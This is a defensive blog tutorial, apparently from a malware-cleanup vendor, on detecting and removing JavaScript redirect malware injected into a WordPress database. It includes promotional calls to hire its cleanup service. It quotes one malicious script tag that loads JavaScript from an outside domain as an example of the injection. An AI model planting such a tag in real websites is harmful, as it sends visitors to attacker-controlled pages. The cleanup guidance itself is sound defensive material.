How to Clean the JavaScript Redirect Malware from WordPress

JavaScript redirect malware is… well special in many ways. One: The most common variant doesn’t infect the WordPress files, so you’ll go in loops installing and reinstalling WordPress to no effect. Two: Common malware scans fail miserably at scanning database. And finally, there’s no way to figure out if a redirect is genuine or malicious.

The cleanup of the JavaScript redirect malware needs manual intervention and some… “skills”. It is always challenging to detect the malicious script which keeps redirecting users to other sites. This tutorial will help you in detecting and removing Javascript Redirect Malware.

Here’s how to identify a JavaScript redirect malware

If you open the web-page, it will redirect in no time. You can’t really trust browser’s built-in Developer Tools because the inspector can’t really tell what kind of redirect it is.

The idea is to inspect the source-code of the WordPress page. For that you’ll have to view the source-code without actually visiting the URL.

Type the URL in the following format into the browser’s address-bar:

view-source:https://www.example.com

And now you can inspect it line by line. Feel free to copy / reformat / beautify the code to make it more legible. Given the right tools, this will help you identify the JavaScript snippet. You are looking for anything that starts with <script> tag.

After fixing so many websites, here’s an example I remember:

<script src='https://setforspecialdomain.com/ghfgh34523452' type='text/javascript'></script>

Cleaning up the JavaScript Redirect Infection

The clean up routine consists of:

  1. Finding the JavaScript snippet in the database.
  2. Replacing it (with nothing).
  3. Verifying the redirect is gone.
  4. Identifying the root-cause

Important Note: Prior to replacing anything take a full backup of your website — WordPress files as well as database.

Let’s start!

Need professional help? Request JavaScript Redirect Malware Cleanup Now →
100% Guaranteed Removal • Detailed Cleanup Report with RCA (Root Cause Analysis)

Step One: Finding the JavaScript snippet in the database

There are two steps in detecting malicious Javascript snippet:

  1. Run Database Scan: Start with scanning the database to find the malicious script. In most of the cases malCure’s WP Malware Scanner will be able to find the malicious script. Don’t rely of this alone. You need to follow second step too.
  2. Scan Page Source: You need to closely watch for all the script tags in source code of the pages which are redirecting to other sites. You may also like to scan your site using Sucuri’s Sitecheck (https://sitecheck.sucuri.net/).

Once you have identified malicious code / malicious script, search for the same using phpMyAdmin. You will be able to find the infected tables by doing so.

Step Two: Replacing the malicious code (with nothing)

For the replacement part I trust a good code editor like VS Code. Export the database as an sql file, open in VS Code, do a find and replace and save the file.

Go to phpMyAdmin and drop all the tables in the infected database and import the cleaned up file. If all went well, your site will be back. Voila!

If you are comfortable with WP CLI, follow the steps here: How to use WP CLI to Search & Replace in the Database

Step Three: Verifying the redirect is gone

After cleaning the database, visit WordPress admin area and clear the cache. Now visit the front-end to make sure the site is not redirecting any more.

Visit the site via private browsing window and re-load multiple times to make sure there is no redirection.

Step Four: Identifying the root-cause

The most common cause of this infection is misuse of the “Database Search and Replace Script” or any other script that has write access to the database. These scripts must be positively removed after use and the website properly secured.

You also need to look elsewhere too and see if there’s anything else leftover and / or has access to the database. Revisit all the themes and plugins and check them for vulnerability against WPScan Vulnerability Database. Delete all the inactive themes and plugins and remove plugins which are no longer actively maintained by the developer.

Need professional help removing malware?

100% Removal Guarantee • Same Day Service • 15 Days Cover